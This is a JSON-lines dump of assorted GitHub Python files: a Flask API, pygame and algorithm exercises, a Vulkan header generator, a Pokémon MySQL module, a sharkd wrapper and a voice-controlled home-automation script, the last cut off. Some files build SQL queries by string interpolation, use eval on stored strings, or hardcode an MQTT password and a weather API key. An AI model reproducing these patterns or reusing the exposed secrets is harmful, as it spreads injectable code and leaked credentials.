\"invalid_request_error\",\n \"message\": error.description\n }), 404\n\n @app.errorhandler(405)\n def method_not_allowed(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 405\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 422\n\n @app.errorhandler(500)\n def internal_server_error(error):\n return jsonify({\n \"success\": False,\n \"type\": \"api_error\",\n \"message\": error.description\n }), 500\n\n return app\n\n\ndef is_integer(value):\n try:\n if type(value) is int:\n return True\n elif 
type(value) is str:\n            int(value)\n        else:\n            return False\n    except Exception:\n        return False\n\n    return True\n","repo_name":"eliasargandara/fsnd-trivia-api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
{"seq_id":"6382293808","text":"import pygame.font\n\n\nclass Button:\n\n    def __init__(self, ai_settings, screen, msg):\n        \"\"\"Initialize the button's attributes.\"\"\"\n        self.screen = screen\n        self.screen_rect = screen.get_rect()\n\n        # Set the dimensions and properties of the button\n        self.width, self.height = 200, 50\n        self.button_color = (0, 255, 0)\n        self.text_color = (255, 255, 255)\n        self.font = pygame.font.SysFont(None, 48)\n\n        # Build the button's rect object and center it\n        self.rect = pygame.Rect(0, 0, self.width, self.height)\n        self.rect.center = self.screen_rect.center\n\n        # The button message needs to be prepped only once\n        self.prep_msg(msg)\n\n    def prep_msg(self, msg):\n        \"\"\"Turn msg into a rendered image and center the text on the button.\"\"\"\n        self.msg_image = self.font.render(msg, True, self.text_color, self.button_color)\n        self.msg_image_rect = self.msg_image.get_rect()\n        self.msg_image_rect.center = self.rect.center\n\n    def draw_button(self):\n        # Draw a blank button, then draw the message on top\n        self.screen.fill(self.button_color, self.rect)\n        self.screen.blit(self.msg_image, self.msg_image_rect)\n","repo_name":"RodrigoPiropo/ALIEN_INVASION","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"}
{"seq_id":"71994914234","text":"# Given a tree of integers, return the number of non-empty unival subtrees.\n# A unival tree is a tree in which every node holds the same value.\n\n# DUMB SOLUTION\n\n# O(n)\ndef isUnival(root):\n    if root is None:\n        return True\n    if root.left is not None and root.left.value != root.value:\n        return False\n    if root.right is not None and root.right.value != root.value: \n        return False\n    if isUnival(root.left) and isUnival(root.right):\n        return True\n    return False\n\n# O(n^2)\ndef countUnivals(root):\n    if root is None:\n        return 0\n\n    count = countUnivals(root.left) + countUnivals(root.right)\n    \n    if isUnival(root):\n        count += 1\n    return count\n    \n\n\n# GOOD SOLUTION O(n)\ndef countUnivals(root):\n    count, is_unival = explore(root)\n    return count\n\ndef explore(root):\n    if root is None: return (0, True)\n    left_count, is_left_unival = explore(root.left)\n    right_count, is_right_unival = explore(root.right)\n    \n    is_unival = True\n    if not is_left_unival or not is_right_unival:\n        is_unival = False\n\n    if root.left is not None and root.left.value != root.value:\n        is_unival = False\n\n    if root.right is not None and root.right.value != root.value:\n        is_unival = False\n\n    if is_unival:\n        return (left_count + right_count +1, True)\n    else:\n        return (left_count + right_count, False)\n\n\n\n# Asked by Google","repo_name":"davide-coccomini/Algorithmic-problems","sub_path":"Python/univalTree.py","file_name":"univalTree.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
{"seq_id":"42835158994","text":"from functools import lru_cache\nimport re\n\ndef log_dict2key(dict_data_repr):\n    key = _get_key_from_log_dict_repr(dict_data_repr)\n    key = re.sub(r'[\\'\"]', '', key)\n    return 
key\n\n\n@lru_cache(maxsize=4096 * 4, typed=False)\ndef _get_key_from_log_dict_repr(processed_log_dict_repr):\n processed_log_dict = eval(processed_log_dict_repr)\n sorted_keys = get_sorted_keys(tuple(processed_log_dict.keys()))\n sorted_list = []\n for k in sorted_keys:\n impl_repr = (k, processed_log_dict[k])\n sorted_list.append(impl_repr)\n key = repr(tuple(sorted_list))\n return key\n\n\n@lru_cache(maxsize=1024, typed=False)\ndef get_sorted_keys(keys):\n return sorted(keys, key=lambda x: x)","repo_name":"erxiaozhou/cp910_runtime_tester","sub_path":"log_content_util/log_dict2key_util.py","file_name":"log_dict2key_util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7960748219","text":"import argparse\nimport gen_common\nimport sys\nimport xml.etree.ElementTree as ET\n\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help='Input XML cache file',\n required=True)\n parser.add_argument('-o', '--output',\n help='Output file to write to',\n required=True)\n parser.add_argument('-a', '--api',\n help='Khronos API being processed',\n required=True)\n args = parser.parse_args()\n\n try:\n dataXml = ET.parse(args.input)\n dataRoot = dataXml.getroot()\n except:\n print(\"Error: Could not open input file: \", args.input)\n sys.exit(1)\n\n # Get first/last versions\n firstVersion = int(dataRoot.get('first'))\n lastVersion = int(dataRoot.get('last'))\n\n outFile = open(args.output, \"w\")\n\n if args.api == 'vulkan':\n apiVersionStr = 'VK_HEADER_VERSION'\n enumType = 'VkResult'\n header = ''\n guard = 'VK_RESULT'\n elif args.api == 'openxr':\n apiVersionStr = '(XR_CURRENT_API_VERSION & 0xffffffffULL)'\n enumType = 'XrResult'\n header = ''\n guard = 'XR_RESULT'\n\n # Common Header\n gen_common.writeHeader(outFile)\n\n outFile.write(\"\"\"#ifndef {0}_TO_STRING_H\n#define {0}_TO_STRING_H\n\n/* USAGE\n To use, include this header where the declarations for the boolean checks are required.\n\n On *ONE* compilation unit, include the definition of:\n #define {0}_TO_STRING_CONFIG_MAIN\n\n so that the definitions are compiled somewhere following the one definition rule.\n*/\n\n#ifdef __cplusplus\nextern \"C\" {{\n#endif\n\n#include {1}\n\n\"\"\".format(guard, header))\n\n # Static asserts\n outFile.write('\\n#ifdef __cplusplus\\n')\n outFile.write(\n \"static_assert({0} >= {1}, \\\"{2} header version is from before the minimum supported version of v{1}.\\\");\\n\".format(apiVersionStr, firstVersion, args.api))\n outFile.write(\n \"static_assert({0} <= {1}, \\\"{2} header version is from after the maximum supported version of v{1}.\\\");\\n\".format(apiVersionStr, lastVersion, args.api))\n outFile.write('#else\\n')\n outFile.write(\n \"_Static_assert({0} >= {1}, \\\"{2} header version is from before the minimum supported version of v{1}.\\\");\\n\".format(apiVersionStr, firstVersion, args.api))\n outFile.write(\n \"_Static_assert({0} <= {1}, \\\"{2} header version is from after the maximum supported version of v{1}.\\\");\\n\".format(apiVersionStr, lastVersion, args.api))\n outFile.write('#endif\\n')\n\n outFile.write(\"\"\"\n/// Returns a string representing the given VkResult parameter. 
If there is no known representation,\n/// returns NULL.\nchar const *{0}_to_string({0} result);\n\"\"\".format(enumType))\n\n if args.api == 'vulkan':\n outFile.write(\"\"\"\n/// Similar to VkResult_to_string, except in the case where it is an unknown value, returns a string\n/// stating '(unrecognized positive/negative VkResult value)', thus never returning NULL.\nchar const *vkResultToString(VkResult result);\n\"\"\")\n\n outFile.write(\"\"\"\n#ifdef {0}_TO_STRING_CONFIG_MAIN\n\nchar const* {1}_to_string({1} result) {{\n // Check in descending order to get the 'latest' version of the error code text available.\n // Also, because codes have been re-used over time, can't use a switch and have to do this large set of ifs.\n // Luckily this *should* be a relatively rare call.\n\"\"\".format(guard, enumType))\n\n # Content\n currentVersion = lastVersion\n while currentVersion >= firstVersion:\n for enum in dataRoot.findall('enums/{}/values/'.format(enumType)):\n if int(enum.get('first')) != currentVersion:\n continue\n\n guarded = False\n # Guard check for first version\n if int(enum.get('first')) != firstVersion:\n guarded = True\n outFile.write(\n '#if {} >= {}'.format(apiVersionStr, enum.get('first')))\n # Guard check for last version\n if int(enum.get('last')) != lastVersion:\n if guarded:\n # If already started, append to it\n outFile.write(\n ' && {} <= {}'.format(apiVersionStr, enum.get('last')))\n else:\n guarded = True\n outFile.write(\n '#if {} <= {}'.format(apiVersionStr, enum.get('last')))\n # Guard check for platforms\n for platform in enum.findall('platforms/'):\n if guarded:\n # If already started, append to it\n outFile.write(' && {}'.format(platform.tag))\n else:\n guarded = True\n outFile.write('#if {}'.format(platform.tag))\n\n if guarded:\n outFile.write('\\n')\n\n outFile.write(' if (result == {})\\n'.format(enum.tag))\n outFile.write(' return \\\"{}\\\";\\n'.format(enum.tag))\n\n if guarded:\n outFile.write('#endif\\n')\n currentVersion -= 1\n\n # Footer\n outFile.write(\"\"\"\n return NULL;\n}\n\"\"\")\n\n if args.api == 'vulkan':\n outFile.write(\"\"\"\nchar const* vkResultToString(VkResult result) {\n char const* pResultString = VkResult_to_string(result);\n if(pResultString != NULL)\n return pResultString;\n\n if (result > 0)\n return \"(unrecognized positive VkResult value)\";\n else\n return \"(unrecognized negative VkResult value)\";\n}\n\"\"\")\n\n outFile.write(\"\"\"\n#endif // {0}_TO_STRING_CONFIG_MAIN\n\n#ifdef __cplusplus\n}}\n#endif\n\n#endif // {0}_TO_STRING_H\n\"\"\".format(guard))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"StableCoder/vulkan-mini-libs-2","sub_path":"tools/generate_result_string_header.py","file_name":"generate_result_string_header.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"16048305850","text":"import pymysql\r\nimport requests\r\nfrom flask import request\r\n\r\nimport pokeAPI\r\nfrom insert import insert\r\n\r\nconnection = pymysql.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"1234\",\r\n db=\"pokemon\",\r\n charset=\"utf8\",\r\n cursorclass=pymysql.cursors.DictCursor\r\n)\r\n\r\n\r\ndef is_pokemon_already(result):\r\n with connection.cursor() as cursor:\r\n cursor.execute(f\"select * from pokemon where id = {result['id']}\")\r\n if cursor.fetchall():\r\n return True\r\n return False\r\n\r\n#\r\n# def insert_pokemon(result):\r\n# tmp = [result]\r\n# insert(tmp)\r\n\r\n\r\ndef 
delete(pokemon_id, trainer_name):\r\n with connection.cursor() as cursor:\r\n query = f\"delete from pokemon_trainer where tname = \\\"{trainer_name}\\\" and pid = \\\"{pokemon_id}\\\";\"\r\n cursor.execute(query)\r\n connection.commit()\r\n\r\n\r\ndef is_pairs(trainer_name,pokemon_id):\r\n with connection.cursor() as cursor:\r\n cursor.execute(f\"select tname from pokemon_trainer where pid = {pokemon_id} and tname = '{trainer_name}'\")\r\n if cursor.fetchall():\r\n return True\r\n\r\ndef evolve(trainer_name,pokemon_id):\r\n with connection.cursor() as cursor:\r\n info = pokeAPI.get_info(pokemon_id)\r\n cursor.execute(f\"select name from pokemon where id = {pokemon_id}\")\r\n res = cursor.fetchone()\r\n tmp = info[\"chain\"]\r\n while tmp[\"species\"][\"name\"] != res[\"name\"]:\r\n tmp = tmp[\"evolves_to\"][0]\r\n if not tmp.get('evolves_to'):\r\n return \"Can't evolve\"\r\n cursor.execute(f\"select id from pokemon where name = '{tmp['evolves_to'][0]['species']['name']}'\")\r\n id = cursor.fetchone()\r\n if is_pairs(trainer_name,id['id']):\r\n return \"this trainer already has this Pokémon\"\r\n cursor.execute(f\"update pokemon_trainer set pid = {id['id']} where tname = '{trainer_name}' and pid = {pokemon_id}\")\r\n connection.commit()\r\n\r\ndef Get_name_pokemons_by_trainer(trainer):\r\n with connection.cursor() as cursor:\r\n query = f\"select pokemon.name from pokemon_trainer,pokemon where pokemon_trainer.tname = '{trainer}' and \" \\\r\n f\"pokemon_trainer.pid = pokemon.id \"\r\n cursor.execute(query)\r\n res = cursor.fetchall()\r\n return [x['name'] for x in res]\r\n\r\n\r\ndef get_pokemons_by_trainer(trainer):\r\n with connection.cursor() as cursor:\r\n cursor.execute(\r\n f\"select * from pokemon where id in (select pid from pokemon_trainer where tname = '{trainer}')\")\r\n return cursor.fetchall()\r\n\r\ndef get_pokemon_from_war(trainer):\r\n with connection.cursor() as cursor:\r\n cursor.execute( f\"select pokemon from war where trainer = '{trainer}'\")\r\n return cursor.fetchone()","repo_name":"LeahLevi/pokemon-project","sub_path":"pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3753192716","text":"\nimport matplotlib.pyplot as plt\n\nfrom boutdata.collect import collect\n\nf = collect(\"f\", path=\"data\")\nyup = collect(\"yup\", path=\"data\")\nydown = collect(\"ydown\", path=\"data\")\n\nplt.plot(f[0,4,4,:], label=\"f\")\nplt.plot(yup[4,4,:], label=\"f.yup\")\nplt.plot(ydown[4,4,:], label=\"f.ydown\")\n\nplt.legend()\n\nplt.savefig(\"plot_interp.pdf\")\nplt.show()\n","repo_name":"LinWeisheng/BOUT-lin-dev","sub_path":"tests/integrated/test-fci-slab/plot_interp.py","file_name":"plot_interp.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29628464189","text":"print(\"Welcome to the Rollercoaster\")\r\nheight = int(input(\"what is your height in cm? \"))\r\n\r\nif height >= 120:\r\n print(\"You can ride the rollercoaster\")\r\n age = int(input(\"what is your age? \"))\r\n if age >= 45 and age <= 55:\r\n bill = 0 \r\n elif age >= 18:\r\n bill = 12 \r\n print(f\"Adult tickets are ${bill}\")\r\n elif age >= 12:\r\n bill = 7 \r\n print(f\"Youth ticketts are ${bill}\")\r\n else:\r\n bill = 5\r\n print(f\"Children tickets are ${bill}\")\r\n wants_Photo = input('Do you want a photo taken? 
Y or N ')\r\n    # riders aged 45 to 55 ride for free, with or without a photo\r\n    if age >= 45 and age <= 55:\r\n        print(f\"Your bill is ${bill}, you can ride for free!\")\r\n    # a photo costs an extra $3 for everyone else\r\n    elif wants_Photo == 'Y':\r\n        bill += 3\r\n        print(f\"Your bill is ${bill}\")\r\n    else:\r\n        print(f\"Your bill is ${bill}\")\r\nelse:\r\n    print(\"Sorry, you cannot ride the rollercoaster\")\r\n","repo_name":"Husayn01/Roller_Coaster.py","sub_path":"Rollercoaster.py","file_name":"Rollercoaster.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
{"seq_id":"42558694241","text":"from sqlalchemy import (Column, Index, UniqueConstraint)\nfrom sqlalchemy.dialects import mysql\nfrom .base import Base\nfrom .region import Region\nfrom .source import Source\nfrom .genomic_feature import GenomicFeature\nfrom .genomicFeatureMixin1 import GFMixin1\nfrom sqlalchemy.ext.declarative import declared_attr\n\nclass CpGIsland(GFMixin1, Base):\n\n    __tablename__ = \"cpg_islands\"\n\n    cpgs = Column(\"cpgs\", mysql.INTEGER, nullable=False)\n    gcs = Column(\"gcs\", mysql.INTEGER, nullable=False)\n    percent_cpg = Column(\"percent_cpg\", mysql.FLOAT, nullable=False)\n    percent_gc = Column(\"percent_gc\", mysql.FLOAT, nullable=False)\n    obsexp_ratio = Column(\"obsexp_ratio\", mysql.FLOAT, nullable=False)\n\n    @declared_attr\n    def __table_args__(cls):\n        return (\n            UniqueConstraint(cls.region_id, cls.source_id),\n            Index(\"ix_join\", cls.region_id, cls.source_id),\n            {\"mysql_engine\": \"InnoDB\", \"mysql_charset\": \"utf8\"}\n        )\n\n    \n    @classmethod\n    def as_genomic_feature(self, feat):\n\n        qualifiers = {\n            \"uid\": feat.CpGIsland.uid,\n            \"cpgs\": feat.CpGIsland.cpgs,\n            \"gcs\": feat.CpGIsland.gcs,\n            \"percent_cpg\": feat.CpGIsland.percent_cpg,\n            \"percent_gc\": feat.CpGIsland.percent_gc,\n            \"obsexp_ratio\": feat.CpGIsland.obsexp_ratio,\n            \"source\": feat.sourceName,\n        }\n\n        genomic_feature = super().as_genomic_feature(feat)\n        genomic_feature.qualifiers = qualifiers\n        return genomic_feature","repo_name":"wassermanlab/GUD","sub_path":"GUD/ORM/cpg_island.py","file_name":"cpg_island.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
{"seq_id":"36340425812","text":"#!/usr/bin/python3\n\nfrom random import randint\nfrom Files.task import Task\n\nclass Utilisation:\n\n    def __init__(self,numberOfTasks,utilisationFactor):\n        self._utilisation = utilisationFactor\n        self._numberOfTasks = numberOfTasks\n        self._use = self.splitUtilisation()\n        self._result = self.findSystem()\n\n    def splitUtilisation(self):\n        result = [randint(1,100) for i in range(self._numberOfTasks)]\n        ratio = self._utilisation/sum(result)\n        result = [round(value*ratio) for value in result]\n        return result\n\n    def findSystem(self):\n        result = []\n        for use in self._use:\n            print(use)\n            Ti = randint(1,1000)\n            Ci = round(use*(Ti/100))\n            task = Task()\n            task.setAll(0, 0, Ti, randint(Ci, Ti), Ci)\n            result.append(task)\n        return result\n\n    # Print result\n    def printUse(self):\n        print(\"Total use : \"+str(sum(self._use)), end=\"\")\n        print(\" (\"+\" \".join(str(u) for u in self._use)+\")\")\n\n    def printSystem(self):\n        for task in self._result:\n            
print(task.toString())\n","repo_name":"NathanLiccardo/INFO-F404","sub_path":"src/Part1/Generator/utilisation.py","file_name":"utilisation.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71246949114","text":"import pandas as pd\nfrom pcapng_access import SharkdDataAccess\n\n\ndef get_json_bytes(json_string):\n return bytes((json_string + '\\n'), 'utf-8')\n\ndef safe_float(string_in):\n try:\n out = float(string_in)\n except:\n out = None\n return out\n\n\nclass SharkdSession:\n json_trace = False\n s = \"\"\n is_connected = False\n rpcid = 0\n data_access = SharkdDataAccess()\n\n def __init__(self, ip_address, port):\n self.data_access.start_session(ip_address, port)\n self.is_connected = True\n\n def sharkd_load(self, filespec):\n params = f'\"file\":\"{filespec}\"'\n return self.data_access.rpc_send_recv('load', params )\n\n def sharkd_analyse(self):\n return self.data_access.rpc_send_recv('analyse', None)\n\n def sharkd_get_status(self):\n return self.data_access.rpc_send_recv('status', None)\n\n def set_config(self, params):\n data_out = self.data_access.rpc_send_recv('setconf', params)\n return\n\n def get_conversations_ip(self):\n params = '\"tap0\":\"conv:IP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'IP'\n return df\n\n def get_conversations_tcp(self):\n params = '\"tap0\":\"conv:TCP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'TCP'\n return df\n\n def get_conversations_udp(self):\n params = '\"tap0\":\"conv:UDP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'UDP'\n return df\n\n def get_conversations_sctp(self):\n params = '\"tap0\":\"conv:SCTP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'SCTP'\n return df\n\n def get_frame(self, framenum):\n params = f'\"frame\":{framenum}, \"proto\":true'\n return self.data_access.rpc_send_recv('frame', params)\n\n def get_frames(self, filter_expression, ws_fields):\n self.rpcid += 1\n index = 0\n pkt_list_cols = ''\n\n # make sure the data_access object knows the data type\n # for each field\n self.data_access.init_schema(ws_fields)\n\n for ws_field in ws_fields:\n pkt_list_cols += f'\"column{index}\":\"{ws_field}:1\"'\n index += 1\n\n if filter_expression == None:\n params = pkt_list_cols\n else:\n params = f'\"filter\":\"{filter_expression}\", {pkt_list_cols}'\n\n response, rsp_code, msg = self.data_access.rpc_send_recv('frames', params)\n pkts = response['result']\n\n data_out = []\n for pkt in pkts:\n new_row = []\n for j in range(len(ws_fields)):\n ######## MODIFy this to translate the value type\n new_row.append(self.data_access.switch_ftype(pkt['c'][j], j))\n data_out.append(new_row)\n\n df = pd.DataFrame(data=data_out)\n if df.size > 0:\n df.columns = ws_fields\n\n return df\n\n def get_dns(self, filter_expression) -> object:\n cols = [\n \"frame.number\",\n \"ip.src\",\n \"ip.dst\",\n \"dns.flags.response\",\n \"dns.id\",\n \"dns.qry.name\",\n \"transum.art\",\n \"transum.status\",\n ]\n if filter_expression:\n filter_exp = f'dns && ( {filter_expression} )'\n else:\n filter_exp = 'dns'\n\n return self.get_frames(filter_exp, 
cols)\n\n def get_rte(self, filter_exp) -> object:\n cols = [\n 'frame.number',\n 'ip.src',\n 'tcp.srcport',\n 'ip.dst',\n 'tcp.dstport',\n 'transum.art',\n 'transum.st',\n 'transum.reqspread',\n 'transum.rspspread',\n 'transum.status',\n ]\n\n return self.get_frames(filter_exp, cols)\n\n def get_ip_ttl(self) -> object:\n cols = [\n \"frame.number\",\n \"ip.src\",\n \"ip.dst\",\n \"ip.ttl\",\n ]\n filter_exp = 'ip'\n return self.get_frames(filter_exp, cols)\n\n def get_start_end(self) -> tuple[str, str]:\n status = self.sharkd_get_status()\n last_frame = int(status[0]['result']['frames'])\n cols = [\n \"frame.number\",\n \"frame.time\",\n \"frame.time_epoch\",\n ]\n first_frame_detail = self.get_frames('frame.number==1', cols)\n last_frame_detail = self.get_frames(f'frame.number=={last_frame}', cols)\n return first_frame_detail['frame.time'][0], last_frame_detail['frame.time'][0]\n\n def get_expert(self):\n params = '\"tap0\":\"expert\"'\n expert_response = self.data_access.rpc_send_recv('tap', params)\n expert_pkts = expert_response[0]['result']['taps'][0]['details']\n return pd.DataFrame(data=expert_pkts)\n\n def get_tcp_seg_meta(self, data_only):\n cols = [\n 'tcp.stream',\n 'ip.src',\n 'tcp.srcport',\n 'ip.dst',\n 'tcp.dstport',\n 'frame.number',\n 'frame.time_relative',\n 'ip.id',\n 'tcp.seq_raw',\n 'tcp.ack_raw',\n 'tcp.analysis.retransmission',\n 'tcp.analysis.duplicate_ack_frame',\n ]\n if data_only:\n filter_exp = 'tcp.len>0'\n else:\n filter_exp = 'tcp'\n\n return self.get_frames(filter_exp, cols)\n\n def sharkd_close(self):\n self.data_access.close_session()\n","repo_name":"credible58/papr","sub_path":"sharkd.py","file_name":"sharkd.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"70213461753","text":"# PROJET2\n# objet Intelligent :\n# mis en relation de protocole reseau mqtt, interface graphique,\n# base de donnees mongodb, api meteo, gpio et traitement language naturel\n\n\n\nfrom speech_recognition import Recognizer, Microphone\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom PicoTTS import TTS_engine\nfrom PIL import Image as IMG, ImageTk\nfrom time import sleep\nimport paho.mqtt.client as mqtt\nimport datetime\nimport pymongo\nfrom RPiSim import GPIO\nfrom tkinter import *\nfrom project2_mongoconsole import *\nfrom threading import Thread\nimport requests\nfrom pyowm import OWM\nfrom pyowm.utils.config import get_default_config\nimport os\n\n# constante du programme\npin_lum1 = 18 # lumiere entree\npin_lum2 = 17 # lumiere salone\npin_alarm = 15 # sys alarme\npin_porte = 13 # porte\n\netat_lum1 = \"OFF\"\netat_lum2 = \"OFF\"\netat_alarm = \"DISARMED\"\netat_porte = \"CLOSE\"\nrunning = True\nchannel_gpio = \"eventdevice\"\n\ntext = \"\"\nphrases = [u\"quelle heure est-il?\",\n u\"il est quelle heure?\",\n u\"quelle heure il est?\",\n \n u\"quel temps fait-il?\",\n u\"quel est la température?\",\n u\"quel est la météo?\",\n u\"quelles sont les prévision météo?\",\n u\"quelles sont les prévisions de la météo?\",\n u\"quelle temperature fait-il?\",\n \n u\"ouvrir la lumière de l'entrer\",\n u\"ouvre la lumière de l'entrer\",\n u\"ouvre la lumière d'entrer\",\n u\"allumer la lumière de l'entrer\",\n u\"fermer la lumière de l'entrer\",\n u\"ferme la lumière de l'entrer\",\n u\"éteindre la lumière de l'entrer\",\n \n u\"ouvrir la lumière du salon\",\n u\"ouvre la lumière du salon\",\n u\"allumer la lumière du salon\",\n u\"fermer la lumière du salon\",\n 
u\"éteindre la lumière du salon\",\n \n u\"ouvrir la porte\",\n u\"ouvre la porte\",\n u\"ouverture de la porte\",\n u\"fermer la porte\",\n u\"ferme la porte\",\n u\"fermeture de la porte\",\n \n u\"fermer le système d'alarme\",\n u\"ferme le système d'alarme\",\n u\"éteindre le système d'alarme\",\n u\"arreter le système d'alarme\",\n u\"désarmer le système d'alarme\",\n u\"allumer le système d'alarme\",\n u\"ouvrir le système d'alarme\",\n u\"ouvre le système d'alarme\",\n u\"démarrer le système d'alarme\",\n u\"armer le système d'alarme\"\n ]\n\n# instanciation du module integrant mongodb\nmong = MongoConsole(\"localhost\", \"evenement\", \"historique\")\n\n# instanciation des modules vocaux\nrecognizer = Recognizer()\ntts = TTS_engine()\n\n# initialisation du protocole mqtt\nhost = \"node02.myqtthub.com\"\nport = 1883\nclean_session = True\nclient_id = \"telephone\"\nuser_name = \"popocoagul\"\npassword = \"Popo21popo21ecole\"\n\nclient = mqtt.Client(client_id = client_id, clean_session = clean_session)\nclient.username_pw_set (user_name, password)\nclient.connect (host, port)\n\n\n# initialisation du protocole gpio\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(pin_lum1,GPIO.MODE_OUT, initial=GPIO.LOW) #lumiere 1\nGPIO.setup(pin_lum2,GPIO.MODE_OUT, initial=GPIO.LOW) #lumiere 2\nGPIO.setup(pin_alarm,GPIO.MODE_OUT, initial=GPIO.LOW) #alarme \nGPIO.setup(pin_porte,GPIO.MODE_OUT, initial=GPIO.LOW) #alarme \n\n\n\n# initialisation du protocole openmediaweather\nconfig_dict = get_default_config()\nconfig_dict['language'] = 'fr'\n\nowm = OWM('f29f5d4679785c63240b83b42f050dd8', config_dict)\nmgr = owm.weather_manager()\n\nobservation = mgr.weather_at_place('Montreal,CA')\nmeteo = observation.weather\n\n\n\n#SYSTEME VOX\n# fonction d'ecoute de langage naturel \ndef listening():\n global text\n text = \"\"\n with Microphone() as source:\n print(\"Réglage du bruit ambiant... 
Patientez...\")\n recognizer.adjust_for_ambient_noise(source)\n print(\"Vous pouvez parler...\")\n try:\n recorded_audio = recognizer.listen(source, 10)\n print(\"Enregistrement terminé !\")\n try:\n print(\"Reconnaissance du texte...\")\n text = recognizer.recognize_google(recorded_audio,language=\"fr-FR\")\n print(\"Vous avez dit : {}\".format(text))\n textlist = list(text.split())\n print (textlist)\n return text\n except Exception as ex:\n print(ex)\n print(\"cant return text\") \n except:\n tts.say(\"Aucune commande détecté\")\n print(\"no command detected\")\n\n# fonction d'analyse du texte recuperer lors de l'ecoute de langue naturel\ndef analyze(): \n if text == \"\":\n pass\n else:\n try:\n (modele, score) = process.extractOne(text, phrases)\n print(modele, score)\n if score >= 89:\n if modele in {\"quelle heure est-il?\",\n \"il est quelle heure?\",\n \"quelle heure il est?\"}:\n clockwork()\n print(\"sys_vox heure\")\n \n elif modele in {\"quel temps fait-il?\",\n \"quel est la température?\",\n \"quel est la météo?\",\n \"quelle temperature fait-il?\",\n \"quelles sont les prévision météo?\"}:\n meteo_vox()\n print(\"sys_vox meteo\")\n \n elif modele in {\"ouvrir la lumière de l'entrer\",\n \"ouvre la lumière de l'entrer\",\n \"ouvre la lumière d'entrer\",\n \"allumer la lumière de l'entrer\"}:\n publicate(channel_gpio, \"lumiere1_ON\")\n mong.push(\"lumiere1\", \"ON\")\n compute(\"allumage lumière de l'entrer\")\n print(\"sys_vox lumiere entree on\")\n \n elif modele in {\"fermer la lumière de l'entrer\",\n \"ferme la lumière de l'entrer\",\n \"eteindre la lumière de l'entrer\"}:\n publicate(channel_gpio,\"lumiere1_OFF\")\n mong.push(\"lumiere1\",\"OFF\")\n compute(\"fermeture lumière de l'entrer\")\n print(\"sys_vox lumiere entre off\")\n \n elif modele in {\"ouvrir la porte\",\n \"ouvre la porte\",\n \"ouverture de la porte\"}:\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n print(\"sys_vox porte ouverture\")\n \n elif modele in {\"fermer la porte\",\n \"ferme la porte\",\n \"fermeture de la porte\"}:\n publicate(channel_gpio, \"porte_OFF\")\n mong.push(\"porte\", \"FERMETURE\")\n compute(\"fermeture porte\")\n print(\"sys_vox porte fermeture\")\n \n elif modele in {\"ouvrir la lumière du salon\",\n \"ouvre la lumière du salon\",\n \"allumer la lumière du salon\"}:\n publicate(channel_gpio,\"lumiere2_ON\")\n mong.push(\"lumiere2\", \"ON\")\n compute(\"allumage lumière du salon\")\n print(\"sys_vox lumiere salon, allumage\")\n \n elif modele in {\"fermer la lumière du salon\",\n \"ferme la lumière du salon\",\n \"eteindre la lumière du salon\"}:\n publicate(channel_gpio,\"lumiere2_OFF\")\n mong.push(\"lumiere2\", \"OFF\")\n compute(\"fermeture lumière du salon\")\n print(\"sys_vox lumiere salon off\")\n \n elif modele in {\"ouvrir la porte\",\n \"ouvre la porte\",\n \"ouverture de la porte\"}:\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n print(\"sys_vox porte ouverture\")\n \n elif modele in {\"fermer la porte\",\n \"ferme la porte\",\n \"fermeture de la porte\"}:\n publicate(channel_gpio, \"porte_OFF\")\n mong.push(\"porte\", \"FERMETURE\")\n compute(\"fermeture porte\")\n print(\"sys_vox porte fermeture\")\n \n elif modele in {\"fermer le système d'alarme\",\n \"ferme le système 